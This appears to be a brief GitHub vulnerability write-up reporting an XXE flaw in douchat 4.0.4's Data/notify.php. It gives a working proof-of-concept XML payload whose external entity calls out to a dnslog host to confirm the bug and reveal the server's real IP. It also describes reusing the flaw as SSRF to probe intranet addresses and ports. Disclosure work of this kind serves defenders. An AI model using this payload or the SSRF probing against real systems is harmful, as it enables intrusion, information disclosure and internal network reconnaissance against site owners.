Permalink
Switch branches/tags
Nothing to show
Find file Copy path
05df74d Oct 23, 2018
1 contributor

Users who have contributed to this file

25 lines (22 sloc) 884 Bytes

douchat

xxe

Code analysis

Vulnerability code is located douchat-4.0.4\Data\notify.php 10 line. Simplexml_load_string function can parse XML,thus forming an XXE vulnerability

Vulnerability display

Build a POC:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://3dy5gu.ceye.io/xxe_test">
%remote;]>
<root/>

Used dnslog here POST of POC Dnslog has received the display

The covered place is the real IP address of the target server.

XXE is accompanied by an SSRF vulnerability for intranet detection.For intranet detection, simply change the address to the intranet IP and port. If it is enabled, it will be displayed.